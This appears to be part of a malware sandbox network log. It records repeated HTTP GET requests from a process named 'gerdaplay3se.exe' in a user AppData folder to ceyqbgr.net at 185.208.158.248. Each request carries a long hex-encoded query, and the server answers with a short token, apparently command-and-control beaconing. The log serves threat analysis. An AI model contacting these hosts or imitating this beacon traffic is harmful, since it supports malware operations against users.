Sep 27, 2024 17:32:18.381916046 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:18.490320921 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:18.733568907 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	57544	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:18.886420012 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:19.582662106 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:19.695391893 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:19.930829048 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	57545	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:20.061382055 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:20.791169882 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	57547	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:20.936194897 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:21.648509026 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:21.776375055 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:22.019803047 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	57548	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:22.323118925 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:22.948270082 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	57549	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:23.094127893 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:23.788425922 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:23.897870064 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:24.221721888 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:24.334002972 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:24.572361946 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	57550	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:24.715336084 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:25.416487932 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	57551	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:25.544553041 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:26.238362074 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:26.349770069 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:26.620265007 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	57552	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:26.747193098 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:27.662174940 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:27.665425062 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:27.775023937 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:28.011087894 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	57553	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:28.194942951 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:28.893805981 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:29.007306099 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:29.249866009 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	57554	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:29.372437000 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:30.081671000 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:30.198513985 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:30.439491034 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	57555	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:30.565201044 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:31.293672085 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	57556	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:31.500194073 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:32.209187984 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:32.319962025 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:32.559019089 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	57557	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:32.690319061 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:33.392370939 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	57558	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:33.516614914 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:34.215002060 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	57559	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:34.341538906 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:35.049894094 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:35.163914919 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:35.411149025 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20
Sep 27, 2024 17:32:35.523046017 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Sep 27, 2024 17:32:35.763844013 CEST	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Fri, 27 Sep 2024 15:32:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	57560	185.208.158.248	80	4052	C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 17:32:35.887816906 CEST	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1 Host: ceyqbgr.net User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
